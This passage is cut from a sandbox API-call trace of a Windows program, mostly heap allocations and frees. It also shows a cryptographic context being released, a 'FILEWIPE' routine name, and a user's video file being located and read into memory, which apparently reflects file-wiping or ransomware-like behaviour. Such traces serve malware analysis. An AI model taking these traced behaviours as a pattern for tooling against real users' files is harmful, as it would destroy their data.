dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0196.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0196.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0196.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0196.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0196.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0196.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0196.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0196.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0196.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0196.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0196.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0196.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0196.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x90d440, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0196.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0196.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0196.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0196.749] GetProcAddress (hModule=0x74f20000, lpProcName="CryptReleaseContext") returned 0x74f2e124 [0196.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0196.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0196.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0196.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0196.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0196.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0196.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0196.749] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0196.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0196.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0196.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0196.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0196.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0196.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0196.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0196.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0196.752] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0196.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0196.752] FreeLibrary (hLibModule=0x74f20000) returned 1 [0196.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0196.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0196.757] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0196.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0196.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0196.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0196.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0196.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0196.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0196.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0196.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda50 [0196.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0196.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0196.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0196.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0196.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0196.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0196.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0196.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0196.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0196.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0196.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0196.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0196.758] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50390e50, ftCreationTime.dwHighDateTime=0x1d5e42f, ftLastAccessTime.dwLowDateTime=0xd54794f0, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0xd54794f0, ftLastWriteTime.dwHighDateTime=0x1d5deb6, nFileSizeHigh=0x0, nFileSizeLow=0x5016, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="RIN_E.avi", cAlternateFileName="")) returned 0x90af58 [0196.758] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0196.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0196.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0196.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0196.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0196.759] CharLowerBuffW (in: lpsz="byte[20502]", cchLength=0xb | out: lpsz="byte[20502]") returned 0xb [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0196.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0196.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0196.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0196.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0196.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5016) returned 0x8fff00 [0196.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0196.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0196.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0196.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0196.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0196.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0196.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0196.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0196.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0196.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0196.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0196.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0196.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0196.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0196.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0196.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0196.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0196.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0196.761] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0196.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0196.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0196.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0196.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0196.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0196.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0196.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0196.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0196.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0196.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0196.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0196.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0196.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0196.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0196.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0196.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0196.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0196.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0196.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0196.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0196.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0196.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0196.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0196.762] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0196.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0196.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0196.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0196.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0196.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0196.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0196.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0196.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0196.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0196.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0196.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0196.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0196.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0196.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0196.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0196.763] RtlAllocateHeap (HeapHandle=0x8a0000, 